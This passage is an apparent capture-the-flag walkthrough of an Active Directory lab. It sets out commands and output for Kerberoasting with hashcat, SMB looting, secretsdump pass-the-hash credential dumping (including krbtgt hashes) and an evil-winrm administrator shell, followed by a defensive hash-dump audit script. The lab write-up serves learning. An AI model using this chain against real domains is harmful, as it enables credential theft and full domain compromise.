└─$ grep '\$krb5tgs\$' all_hashes.txt > clean_hashes.txt
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ hashcat -m 13100 clean_hashes.txt /usr/share/wordlists/rockyou.txt --force
hashcat (v7.1.2) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-AMD Ryzen 5 PRO 8640HS w/ Radeon 760M Graphics, 4779/9558 MB (2048 MB allocatable), 12MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 5 digests; 5 unique digests, 5 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 515 MB (7812 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$599145c362d702134cd913523ca1fae0$...:[CRACKED_PASSWORD]
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: clean_hashes.txt
Time.Started.....: Sun May 10 01:48:00 2026, (9 secs)
Time.Estimated...: Sun May 10 01:48:09 2026, (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 7682.7 kH/s (1.30ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/5 (20.00%) Digests (total), 1/5 (20.00%) Digests (new), 1/5 (20.00%) Salts
Progress.........: 71721925/71721925 (100.00%)
Rejected.........: 0/71721925 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#01..: Salt:4 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: !carolyn -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#01.: Temp: 92c Util: 85%
Started: Sun May 10 01:47:59 2026
Stopped: Sun May 10 01:48:09 2026
The run stopped partway through (1 of 5 digests recovered), but cracking file_svc's TGS ticket succeeded.
Using the recovered file_svc password, let's look at the Users\admin folder on the share, where the root flag is likely to be.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ smbclient //10.48.188.21/Users -U 'file_svc%[CRACKED_PASSWORD]' -c 'ls admin'
NT_STATUS_ACCESS_DENIED listing \admin
Unfortunately, the contents of admin cannot be viewed.
Let's look at backup.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ smbclient //10.48.188.21/backup -U 'file_svc%Password123!!'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jun 18 02:41:17 2024
.. DR 0 Sat Jul 26 02:51:20 2025
backup_extract.txt A 892 Mon Jun 17 17:41:05 2024
12942591 blocks of size 4096. 10704179 blocks available
smb: \> mget backup_extract.txt
Get file backup_extract.txt? y
getting file \backup_extract.txt of size 892 as backup_extract.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \>
It contains a text file named backup_extract.txt.
Looking at its contents, we find the NTLM hashes of the accounts listed.
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:[FileServer NTLM hash]:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
Here, using FileServer's NTLM hash, we check whether secretsdump can pull hashes and keys from the SAM, LSA secrets, and NTDS.dit (pass-the-hash with the machine account).
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ impacket-secretsdump 'SOUPEDECODE.LOCAL/FileServer$@[target_ip]' -hashes [FileServer NTLM hash]
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0c7ad5e1334e081c4dfecd5d77cc2fc6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
SOUPEDECODE\DC01$:aes256-cts-hmac-sha1-96:46291478e66446d0dc1823ea2782aba94eb4b6dd86a39a48b8e72e20e2f0df35
SOUPEDECODE\DC01$:aes128-cts-hmac-sha1-96:36303f4d179f3d45d3ec6cfc80e52708
SOUPEDECODE\DC01$:des-cbc-md5:c4706dec6e083bd5
SOUPEDECODE\DC01$:plain_password_hex:0009b92fca1fc62f0062b97ca0eb3f6a6db00c77b4ba637233570d4661e4bd1e3bd0eb908af0bf4432cf90b80731a1e597c28f3cf4576db28d636bdfe94e05a1734b4405c9505478a5a5b0c0d3604b62e116ad7ccd40a689df90f38d6d95b7f2d7745eee08d4654336e52014f1721b5a7696f7631ee74ceff7cc200240cb3504045ad8211e78ab30b2d3f5ea515ac902d1cd103dd684cb8c045732fa9c42f012394a043f1dac35ac76eeeb1605d366dbfd5d66a1c9812f02f721850495b5d8fcca18f5fc8f479a0745aaf3a672a3d5bb392c0714146db02f69a8f0f3813ce07ccf32874b6d98e170598fcfe13070276f
SOUPEDECODE\DC01$:aad3b435b51404eeaad3b435b51404ee:72db3acc7d4f0770a1b371242a29c3ff:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x829d1c0e3b8fdffdc9c86535eac96158d8841cf4
dpapi_userkey:0x4813ee82e68a3bf9fec7813e867b42628ccd9503
[*] NL$KM
0000 44 C5 ED CE F5 0E BF 0C 15 63 8B 8D 2F A3 06 8F D........c../...
0010 62 4D CA D9 55 20 44 41 75 55 3E 85 82 06 21 14 bM..U DAuU>...!.
0020 8E FA A1 77 0A 9C 0D A4 9A 96 44 7C FC 89 63 91 ...w......D|..c.
0030 69 02 53 95 1F ED 0E 77 B5 24 17 BE 6E 80 A9 91 i.S....w.$..n...
NL$KM:44c5edcef50ebf0c15638b8d2fa3068f624dcad95520444175553e85820621148efaa1770a9c0da49a96447cfc896391690253951fed0e77b52417be6e80a991
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[Administrator NTLM hash]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb9d84e61e78c26063aced3bf9398ef0:::
soupedecode.local\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::
soupedecode.local\otara1:1104:aad3b435b51404eeaad3b435b51404ee:ee98f16e3d56881411fbd2a67a5494c6:::
soupedecode.local\kleo2:1105:aad3b435b51404eeaad3b435b51404ee:bda63615bc51724865a0cd0b4fd9ec14:::
....
....
This dumped the NTLM hashes of every account in Active Directory.
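Both backup_extract.txt and the secretsdump output above use the pwdump layout account:rid:lmhash:nthash:::, and that layout already tells a defender a lot before any cracking: an LM field other than aad3b435... means LM storage is still on, an NT field equal to 31d6cfe0... is an empty password, and two accounts with the same NT hash share a password (here MailServer$/BackupServer$ and CitrixServer$/MonitoringServer$). The audit below is an added example, not code from the original post; it is the check you would run over such a dump after an incident or an authorised assessment. The sample consists of the dump lines shown on this page (the redacted FileServer$ and Administrator lines are left out) plus one domain-prefixed line from the NTDS section.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of "" (what you get when LM storage is disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

# Sample taken from the dump lines shown on this page (backup_extract.txt, the local
# SAM section, and one domain\user line from the NTDS section). Redacted lines omitted.
SAMPLE_DUMP = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
soupedecode.local\\bmark0:1103:aad3b435b51404eeaad3b435b51404ee:d72c66e955a6dc0fe5e76d205a630b15:::
"""


class Entry(NamedTuple):
    account: str
    rid: int
    lm: str
    nt: str


# account:rid:lmhash:nthash::: ; banners, "[*]" lines and redacted placeholders do not match
DUMP_LINE = re.compile(
    r"^(?P<acct>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I)


def parse_dump(text: str) -> List[Entry]:
    entries = []
    for line in text.splitlines():
        m = DUMP_LINE.match(line.strip())
        if not m:
            continue
        account = m["acct"].split("\\")[-1]      # drop a "domain\" prefix if present
        entries.append(Entry(account, int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return entries


def audit(entries: List[Entry]) -> Dict[str, object]:
    """Three findings a defender wants from a dump: LM hashes still stored, empty
    passwords, and NT hashes shared by more than one account (same password)."""
    lm_present, empty_password = [], []
    by_nt = defaultdict(list)
    for e in entries:
        if e.lm != EMPTY_LM:
            lm_present.append(e.account)
        if e.nt == EMPTY_NT:
            empty_password.append(e.account)     # not counted as "reuse" below
        else:
            by_nt[e.nt].append(e.account)
    reused = {nt: sorted(accts) for nt, accts in by_nt.items() if len(accts) > 1}
    return {"lm_present": sorted(lm_present),
            "empty_password": sorted(empty_password),
            "reused_nt": reused}


if __name__ == "__main__":
    report = audit(parse_dump(SAMPLE_DUMP))
    print("LM hashes present:", report["lm_present"] or "none")
    print("empty passwords:", report["empty_password"])
    for nt, accounts in report["reused_nt"].items():
        print(f"shared NT hash {nt[:8]}...: {', '.join(accounts)}")
```

Shared hashes between machine accounts are the notable finding here: machine account passwords are normally rotated automatically with random values, so two servers sharing one means the passwords were set by hand, which is also why a leaked copy of this file let one machine account drive DCSync above.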
Using the Administrator NTLM hash we found, we try logging in with evil-winrm (pass-the-hash).
┌──(rikuxx㉿kali)-[~/tryhackme/Soupedecode_01]
└─$ evil-winrm -i [target_ip] -u Administrator -H [Administrator NTLM hash]
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Login succeeded.
The root flag is in C:\Users\Administrator\Desktop.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/17/2024 10:41 AM backup
-a---- 7/25/2025 10:51 AM 33 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
YYYYYYYYYYYYYYYYY
What is the root flag?
Answer: YYYYYYYYYYYYYYYYY
Closing
This time we covered basic attacks in an Active Directory environment.
I think this room is very approachable for beginners to study with. Using Gemini alongside it should also make AD pentesting easier to learn.
Rooms at this level are easy, so it was a nice change of pace. There are no particular tips this time, so I'll end here.
I hope this is helpful.